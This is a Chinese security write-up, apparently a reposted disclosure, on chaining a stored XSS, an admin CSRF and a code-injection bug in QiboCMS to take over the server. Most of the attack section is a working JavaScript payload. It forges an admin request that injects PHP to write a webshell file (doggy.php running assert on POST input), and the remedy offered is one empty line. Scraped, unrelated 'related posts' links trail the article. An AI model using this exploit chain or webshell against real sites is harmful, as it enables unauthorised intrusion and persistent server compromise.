齐博 src=/do/js.php?id=775,齐博CMS存储型XSS可getshell(组合利用)
齐博cms,利用威胁不大的前台存储型xss+没有任何危害的后台CSRF+几乎无影响可忽略的后台getshell 3个0day 结合起来的威力拿下齐博cms,虽然不算什么严重的漏洞,但是中途遇到的问题和突破还是聊以慰藉的,还请各位看官轻轻拍砖. ——by pandas
前一段时间西毒爆出qibocms 0day的时候 就看过齐博cms的代码,发现了几个后台的getshell,后台getshell很多,拿不出手,厂商也是无影响积极忽略的态度,后台提交表单基本都存在CSRF,如果能有一个前台的getshell威力应该会增加许多,于是就去前台黑盒挖出了一个xss.这样结合起来就可以getshell了.
1.存储型XSS位置:会员中心->万能表单->发布信息->版主申请:
postdb[sortname][] 的提交值没有经过过滤,但是进行了长度限制,不过这个长度足以写
于是就提交一个php写文件的代码即可.
1.js内容如下:
thisTHost = top.location.hostname;
thisTHost = "http://"+thisTHost+"/v7/admin/index.php?lfj=jfadmin&action=addjf";
function PostSubmit(url) {
var postUrl = url;
var ExportForm = document.createElement("FORM");
document.body.appendChild(ExportForm);
ExportForm.method = "POST";
var newElement = document.createElement("input");
newElement.setAttribute("name", "title");
var newElement2 = document.createElement("input");
newElement2.setAttribute("name", "fid");
var newElement3 = document.createElement("input");
newElement3.setAttribute("name", "list");
var newElement4 = document.createElement("input");
newElement4.setAttribute("name", "content");
ExportForm.appendChild(newElement);
ExportForm.appendChild(newElement2);
ExportForm.appendChild(newElement3);
ExportForm.appendChild(newElement4);
newElement.value = "${@fwrite(fopen('doggy.php', 'w+'), '<?php assert($_POST[aaa]);?>')}";
newElement2.value = 1;
newElement3.value = 1;
newElement4.value = 1;
ExportForm.action = postUrl;
ExportForm.submit();
};
PostSubmit(thisTHost);
分为两个部分证明:
1.用户部分
1)登录
2)写xss
2.管理员部分
查看申请
在网站/admin目录下会增加doggy.php
内容:
修复方案:
重视即可修复
http://www.dengb.com/wzaq/728283.htmlwww.dengb.comtruehttp://www.dengb.com/wzaq/728283.htmlTechArticle齐博cms,利用威胁不大的前台存储型xss+没有任何危害的后台CSRF+几乎无影响可忽略的后台getshell 3个0day 结合起来的威力拿下齐博cms,虽然不算什...
齐博 src=/do/js.php?id=775,齐博CMS存储型XSS可getshell(组合利用)相关推荐
- 齐博 src=/do/js.php?id=775,齐博CMS列表页,内容页的边栏,用不同的模板显示的方法...
齐博CMS让 列表也,内容页 的 边栏(就是"最新文章""热门文章""推荐文章"那些) 用不同的模板显示的方法 首先,说说思路: 边栏的样式 ...
- node mysql 搭建博客_node.js+Hexo+Git搭建个人博客
今早上考完试回来,接到腾讯云的每月邮件续费通知. 对于一个小开发来讲,买一个云服务器建站最方便不过,但是对于学生党来说还是有些贵. 一想明年7月份,云服务器就一元每月变65每月,加上30来块的域名费, ...
- 基于Hexo+Node.js+github+coding搭建个人博客——进阶篇(从入门到入土)
前言 先附上个人博客链接:http://yangbingdong.com/2017/build-blog-hexo-advanced/ 好久没更新了,因为懒- - 前面介绍了Hexo的一些基本搭建→基 ...
- js获取ID的一些技巧
从外部的js文件中获取ASPX页面的控件ClientID发布:dxy 字体:[增加 减小] 类型:转载 从外部的js文件中获取ASPX页面的控件ClientID(get control referen ...
- web-packwebpack .\src\main.js .\dist\bundle.js 报错
(1)使用指令 web-pack>webpack .\src\main.js .\dist\bundle.js 报错 (2).问题分析,wbpack版本太高,指令不一样.我的是v4.14.0 ...
- ERROR in multi ./src/main.js dist/bundle.js
原命令 webpack .\src\main.js .\dist\bundle.js 报错 ERROR in multi ./src/main.js ./dist/bundle.js Module n ...
- vue报错:dependencies were not found: * element-ui in ./src/main.js * element-ui/lib/theme-chalk/inde
报错信息 These dependencies were not found: * element-ui in ./src/main.js * element-ui/lib/theme-chalk/i ...
- 虎牙改名字服务器升级维护中,王一博“虎牙直播”被占id,无奈改了名字,新名字却被吐槽...
王一博"虎牙直播"被占id,无奈改了名字,新名字却被吐槽 在12月18号的时候,相信很多粉丝都知道一个特别好的消息,因为在晚上10:00的时候,王一博会空降虎牙直播间,这一次他和自 ...
- echart报错echarts/lib/visual/dataColor in ./node_modules/echarts-liquidfill/src/liquidFill.js
报错内容:This dependency was not found: * echarts/lib/visual/dataColor in ./node_modules/echarts-liquidf ...
最新文章
- 算法系列15天速成——第二天 七大经典排序【中】
- 两轴机械臂+机械爪整体控制板设计与机械爪控制调试
- 两物体的相对速度公式_最全物理公式合集,高考这一份就够了!
- VTK:椭圆圆柱用法实战
- Error: Call requires API level 11 (current min is 8): android.app.Activity#onCreateView
- 管理信息系统属于计算机的什么应用领域,全国2013自考《管理系统中计算机应用》...
- 605. 种花问题 golang 切片越界问题和逻辑操作符的思考
- [html] 你喜欢哪种布局风格?说说你的理由
- pythonlinux版本_Linux_Python版本控制
- mysql awk_Awk实用手册(全)
- 计算机辅助几何设计等值曲线,中国科学技术大学硕士专业:计算机辅助几何设计...
- 品质体系及标准大集合(偏向软件)
- 飞鸽传书2011下载(飞鸽传书)
- 软件研发模型和软件测试模型
- python地图制作 - pyecharts(1.9.1)绘制各城市地图
- 解决VS2017/2019无法在线升级
- 简洁的PHP图床源码烟雨图床程序源码
- 从入门到断送职业生涯只差这几步
- 震惊!点几下鼠标就能看到这个网站是不是用凡科搭建的?!
- pythonista检测内容自动点击_Pythonista中文教程:100行代码实现一款远程键盘